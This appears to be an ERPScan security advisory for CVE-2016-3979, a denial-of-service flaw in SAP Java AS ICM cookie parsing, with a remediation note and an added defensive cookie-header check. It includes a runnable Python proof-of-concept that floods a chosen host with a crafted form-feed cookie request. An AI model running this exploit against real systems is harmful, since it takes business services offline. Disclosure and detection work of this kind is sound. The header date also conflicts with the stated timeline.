ERPScan ERPSCAN-16-017
Apr 12, 2015

SAP JAVA AS icman - DoS vulnerability

erpscan.io

EPSS: 0.002 (Low), Percentile: 62.2%

Application: SAP JAVA AS
Versions Affected: SAP JAVA AS 7.2 – 7.4
Vendor URL: SAP
Bugs: Denial of Service
Reported: 04.12.2015
Vendor response: 05.12.2015
Date of Public Advisory: 14.03.2016
Reference: SAP Security Note 2256185
Author: Dmitry Yudin (ERPScan) @ret5et

Vulnerability Information

Class: denial of service
Impact: denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-3979

CVSS Information

CVSS Base Score v3: 7.5/10
CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) Low (L)
PR : Privileges Required (Level of privileges needed to exploit) None (N)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C : Impact to Confidentiality None (N)
I : Impact to Integrity None (N)
A : Impact to Availability High (H)

Description

Internet Communication Manager (ICMAN/ICM) in SAP JAVA AS 7.4 allows remote attackers to cause a denial of service (possible heap corruption in IctParseCookies()) via a crafted HTTP request.

Business risk

A denial of service vulnerability can terminate a process of the vulnerable component. As a result, nobody can use this service, which has a negative influence on business processes. System downtime also harms business reputation.

VULNERABLE PACKAGES

SAP NetWeaver AS JAVA 7.2 - 7.4
Other versions are probably affected too, but they were not checked.

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2256185.

TECHNICAL DESCRIPTION

An anonymous attacker can use a special HTTP request to cause a denial of service in SAP AS JAVA.

Proof of Concept

```python
#!/usr/bin/env python

import socket
import argparse

# HTTP request whose cookie header is ";" followed by form-feed (0x0c) bytes
data = 'get / HTTP/1.0\r\nhost:\r\ncookie: ;\x0c%s\r\n\r\n' % ("\x0c" * 0x1b58)


def run(args):
    addr = (args.ip, args.port)
    try:
        s = socket.create_connection(addr, timeout=0.3)
        # Keep sending the request until the socket raises an error
        while True:
            s.send(data)
    except socket.error:
        pass


if __name__ == '__main__':
    apars = argparse.ArgumentParser(description='icman - 50000 port - DoS')
    apars.add_argument('--ip', type=str, help='icman ip', required=True)
    apars.add_argument('--port', type=int, help='icman web port', required=True, default=50000)
    args = apars.parse_args()
    run(args)
```
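The proof-of-concept request carries a cookie header made of `;` followed by 0x1b58 form-feed (0x0c) bytes, which gives a defender a simple signature to look for in front of unpatched systems. The following check is an added example, not code from ERPScan or SAP; the function name, the sample requests and the `MAX_COOKIE_LEN` limit are assumptions made for illustration.

```python
import re

# C0 control bytes (HTAB excepted) and DEL: none are valid cookie-octets in RFC 6265.
_CTL = re.compile(rb"[\x00-\x08\x0a-\x1f\x7f]")
MAX_COOKIE_LEN = 4096  # assumed policy limit, not an SAP value


def cookie_header_findings(raw_request):
    """Return a list of reasons the Cookie headers of a raw HTTP request look malformed."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    findings = []
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        # Header names are case-insensitive; the PoC sends "cookie" in lower case.
        if not sep or name.strip().lower() != b"cookie":
            continue
        value = value.strip(b" \t")
        ctl = _CTL.findall(value)
        if ctl:
            findings.append("control bytes in Cookie value: count=%d first=0x%02x"
                            % (len(ctl), ctl[0][0]))
        if len(value) > MAX_COOKIE_LEN:
            findings.append("Cookie value length %d exceeds %d"
                            % (len(value), MAX_COOKIE_LEN))
    return findings


# Constructed samples: one shaped like the advisory's PoC request, one ordinary request.
POC_SHAPED_REQUEST = (b"get / HTTP/1.0\r\nhost:\r\ncookie: ;\x0c"
                      + b"\x0c" * 0x1B58 + b"\r\n\r\n")
BENIGN_REQUEST = (b"GET / HTTP/1.1\r\nHost: portal.example\r\n"
                  b"Cookie: JSESSIONID=abc123; lang=en\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("poc-shaped", POC_SHAPED_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, cookie_header_findings(req) or "clean")
```

A check like this belongs in a reverse proxy or log pipeline as a stopgap; the fix remains SAP Security Note 2256185.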
